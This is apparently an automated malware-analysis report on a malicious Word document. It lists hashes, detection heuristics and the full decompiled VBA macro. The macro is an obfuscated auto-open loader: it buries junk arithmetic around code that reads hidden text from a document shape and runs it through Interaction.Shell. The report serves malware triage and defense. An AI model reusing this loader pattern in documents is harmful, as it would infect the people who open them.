Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 91b43ccdca4d7fc8…

MALICIOUS

Office (OLE)

80.9 KB Created: 2018-12-07 12:06:00 Authoring application: Microsoft Office Word First seen: 2020-05-25
MD5: 249e40e507762f76df63782f7937315a SHA-1: edbee146d246d7951856f3a0b47a1b4f779992ae SHA-256: 91b43ccdca4d7fc841c291b1919b56f6c7183c3e2f02b8a2d68995b1b85878f2
292 Risk Score

Heuristics 10

  • ClamAV: Doc.Malware.Generic-6775938-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6775938-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    wcjFbJIqD = Array(IGtOd, OZnkNahLV, QjToCq, Interaction _
.Shell(APpTWwrKjR, tMFvLjNPjk), BZboK)
         Set djOilvYtjlkQIaocjzTaV = XJCUlTCYjvvhoFMSrB
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
wIbwdw
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6310 bytes
SHA-256: 520f4b98a1230ba076f03586cc6e31dcb3aca2af50fd89dd3e3f3a841882b087
Detection
ClamAV: No threats found
Obfuscation or payload: likely
160 of 197 identifiers look randomly generated (e.g. 'NYJKpjYjzXLdIjMLqHKfphMm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XUJihQUO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
wIbwdw
End Sub

Attribute VB_Name = "BGWvAkEM"
Function wIbwdw()
On Error Resume Next
         Set rJdqYtdrjjlVmFS = qJXOcOCikhzVwnFAPlB
      owuWqfJkUTpFbOuCfQicGuG = tItsakGAEZjtOBYwFSOQruu
      tDUwHYltqDcimQJkNoBBi = nishXojpAzOJzX / CLng(105719826) * 48074940 / Tan(300584609) + npDLZpKoIiDCtsEsPqGZ - Cos(7013728) + (324872615 / Int(ADcUcRlUFvVOozcF))
         Set NhOcpVucQjuRfQ = pASIihDQliqdwzASnRmCiMW
      MBLJDFAozDOzEcQTJQczzrw = PQGztOKcdavjVuNfiCjs
      COLATsSkZrVDitmwAujsm = ijkzPDwSzLFtMCvwaV / CLng(291324390) * 292341181 / Tan(30029180) + acnBahiHwzzjkfQVdOnGu - Cos(64133978) + (329347156 / Int(jkDBUNAtPvFHKOdPoqOFvd))
         Set JncYJjnksMZAONlkUJCFD = barNVaEPHfiTzqnCrujXndu
      BzFXNrhOjTLCjwNMfdE = RuNuwRRHZfDzfQLWUjCQwUm
      flWvjTrKZAJGlKbvZZpA = NWQkrrzaovzIhPLvW / CLng(178631225) * 40351418 / Tan(260605398) + YfGEkJFGqYfmRRPFKobsjlE - Cos(80900960) + (334105544 / Int(vPzDwiNVprKfHiu))
         Set JSYDYiAurPLQHEGNah = atoUHPNzBtjHpR
      zRhNmSGQYUhiwEMQKZLOdVzQ = LjwBHHWzJFofMvhUdPAZjR
      ocZhdDUdUQZajHOQMLjmzYk = idtzFzqHuoKYhaswobTPmUwN / CLng(94327949) * 336230086 / Tan(260785939) + zivPrcDzJVXWZSfv - Cos(322013388) + (279548601 / Int(mTnzXEVKJfjlGJcKQsujF))
         Set snqiroMUozSMYQn = aWJNtPtjhGDAUc
      LHITbOnHjzJGHIdzvH = hKhzPcuKAllLALcHF
      zLonPZPkJmYEGHsDv = iJtqhEmWwlIuiAYj / CLng(329049754) * 318317489 / Tan(182373383) + vHifTImwidTwQRdvWHijBta - Cos(194616941) + (181796097 / Int(HXfWJwcAPWbNXZSpr))
Set XSVPzvpMm = XUJihQUO.Shapes(vKnatGf + "SGlzIjjiTIJaj" + pHnZwZ).TextFrame
         Set XXNiSjKuEAFnWzlDo = DCPDzRUvSwGIhw
      MiCZVuXdoXwztrPjIXc = RDUZwOXRLnvSHMJUid
      HjZajATaDDSwlFiJJK = dHXGSBbdqjhuziEVnrco / CLng(165044709) * 188144355 / Tan(258341246) + OspKNcDAJGAMkZHZEW - Cos(196676970) + (303850690 / Int(IUTjkrRhWDATCsZMQQ))
         Set HkbGfEFZsCijXjVcvPJHSTP = XQwlDkPMkdpjuR
      czLFtVJcwUnZhnFZn = ZjOHUWHmRwtrmiiBjI
      OWjNoAQPLiZiEBO = iAVipwGDLiFiEujGzT / CLng(167527313) * 328046285 / Tan(299730024) + aHDGwEsUppXOwBLdQQ - Cos(109314748) + (189194959 / Int(FuiKQCShlcQaNZ))
APpTWwrKjR = XSVPzvpMm.ContainingRange + lrdrkOk + CwtwFYV + hMoGQQn + llSmDAs + qpzdjdn + csOwodz + aEmBr + DquvicK
         Set jtdQNSzAkvpmDAs = SzpBMGuIEZSLvdiVFV
      waBNXTVwsNuTbaTi = zFwZzVLozmFHQUhhoutRmShr
      CvJFrlbujYzZlwF = ZXhQrbsMmmfaRLfYFSzZCi / CLng(49308975) * 9865591 / Tan(194288994) + kviICwobMuAbQaCw - Cos(128960434) + (33679567 / Int(BcVtaTTBfnrQfmd))
         Set tbuElJGSzhMbBGvfTi = aJDKUlzZBhHWJGRziZuIuw
      wbHLYsqzPrwwMpQZSmjFlsL = VkHRFYawbPFiNZ
      hKhriNJEKNzbWKtIGQE = nlZuqRzVwjhMtLCuDAjpMf / CLng(321804269) * 22484262 / Tan(39769293) + DmhHzRIjnwknBNNnIafniLHz - Cos(33343247) + (40523906 / Int(PiHoWosNNnpkQEKXFJPwT))
         Set nMwAiKKXUnVcLpZTtSNaCB = iojIdUacLwXfmOmC
      JhRcTCumanEDHanlBULwBh = tKJdnKnEHQaQVk
      KmoWChWZEXkuluaDlciXR = YHbnizmjKRBSJZJf / CLng(200408211) * 139507267 / Tan(152155674) + FFDQCKjMpoqMRANhuPwZm - Cos(152545283) + (91848479 / Int(sSkBtGwJAjETDLlXR))
         Set NkKtcuXpBncBdGDpOmQm = hYMzsuFwQQAGsPkitHL
      zTjnlsBwADrrvDjMwvjASrk = bulqTKVfFrZNoZLzsG
      NYJKpjYjzXLdIjMLqHKfphMm = dTXYjkHLsWwSkv / CLng(49685033) * 307856936 / Tan(200966597) + HtORdbNUrhaJjMWGLQA - Cos(49183966) + (90251771 / Int(ERPNOsGLDkKJEspLpvLOsZ))
         Set UaYDjHjrFctNlQEzuqPiii = vjzjXSuEuYRzNhjkq
      mPGLZGSGFzGfmLqJdXjbL = KXwoTTrRNFZssOLjGqO
      MwzPmGHEEJBPZOEiN = nzPnkAFtSbzuQsNuLOZiB / CLng(86496961) * 79716978 / Tan(253441558) + EEJSiJcVVDOBYMwJ - Cos(297209214) + (262293952 / Int(GJsJCfCqIfkZndajwwao))
         Set vlTdRMkQoaLZKQWtkXlESwK = YaXqBXFwijkuDzfQrv
      MnKscmfzTPIczb = FqptORVNqbjcplrVMXwzjNiv
      WamjaGnSHupawj = raUQvJpLbtvEBdLrItosr / CLng(230862830) * 198040712 / Tan(103351491) + tJirCuNrKFJtRzujOK - Cos(273442277) + (204590942 / Int(lpvDjhJnuIwEvC))
         Set pwlcpcXQiTXsmLhiXNn = OzAprGQqLiUiavSEpTW
      sICdwSpjqhzHWbJpwwkiM = EzztSrsdoErBjGzWqZQhz
      hMIwlcGtinYLDCiFzwqN = sQUsDsbFLRfiaSmkTFPXvWD / CLng(188987305) * 156576237 / Tan(16621550) + rlZSqlkownGikinXVtddksU - Cos(212006906) + (292093500 / Int(qzWMsUAwkUlzpwpdpwN))
         Set jHTcviVjDmdJZaoIV = wninwniLDsijZocwNFVsBQDN
      ETiVqEzTqRojwJjzjbdwW = pjaNjmcvijUFuUAq
      nkNjXoPQwpvRoaPL = dzudVLquiEPqPMztOpNJdSs / CLng(77553690) * 318523415 / Tan(257245322) + hdtJEuCqCvjRZXookzajdzYa - Cos(238072012) + (16754533 / Int(OKFjhiOIQouLwM))
Const tMFvLjNPjk = 0
         Set uznNLfNmCwsaFVzwvGnMGw = PtzffkvzWsiAzCK
      cMomoLRSCDGQwOOjw = YTNAiBGwViaVzukoKzRJTDc
      cbifzIdvBHirEcinfqqj = hEMfJDPSoXUriYGXbzNEfTs / CLng(103517836) * 300050752 / Tan(239899355) + UiddNsmvXSzpFOcNkJAVE - Cos(158777295) + (102343731 / Int(qdiMNLwlZVuoKt))
wcjFbJIqD = Array(IGtOd, OZnkNahLV, QjToCq, Interaction _
.Shell(APpTWwrKjR, tMFvLjNPjk), BZboK)
         Set djOilvYtjlkQIaocjzTaV = XJCUlTCYjvvhoFMSrB
      imZBnTqhSzYBmNIIEcQKE = LEpUamiPNIRrqhwIPAumjaI
      JTfzIqarinbULSsEwCjQkuX = KwNPPRHkwvLGHlHXhaM / CLng(19378524) * 43277019 / Tan(194917554) + wIpnhrrJOwEnLcKbMjqXQGlz - Cos(89265509) + (309613116 / Int(iJiUUjAQHaiatEmz))
         Set PnwSuDklAUppVpzILEU = DrnjAAnhablVqdjTS
      XXYuVlCjtakVFzL = XXzQRtPCLZiTwr
      jqEhwqJWCiTHMzEV = JoGITCpdHVivCihBRDfARP / CLng(73423292) * 90136867 / Tan(7432017) + lwlDFHDwJJlBNoPDoVabzvmG - Cos(307633704) + (302618590 / Int(VVudsHWQrsEPbsGYXPQ))
         Set IkouAfSDHVJUwjkLI = mWHmKDzVijcqIjJaYfj
      kUYwCjMEUzZcOHvGHWalv = AlaQMaLWLFiXoRwIjdqu
      jHzcAoCTCEvoFU = XmTmtzmUwrTiIwmwuBcTib / CLng(263646254) * 77922982 / Tan(250061267) + CJAjiizLlwKEADu - Cos(251685683) + (7147821 / Int(hJtUPIAncAIvwHAkvdUOJ))
         Set pjnrETwoiIwwTu = mMSwswpCFYNMXTHDQWFfFSp
      GjYQwvKMPzjJjUUDzj = SrGYUWEicNPmUWzrJZYGK
      BzXjzXwBBfYlXcAK = tsMiwANPnjcLib / CLng(176928045) * 151430902 / Tan(27980359) + JBkYjlbMkNjzXqzVfNzfCz - Cos(66801400) + (133664834 / Int(qTpXEzOTmrJTVLbG))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.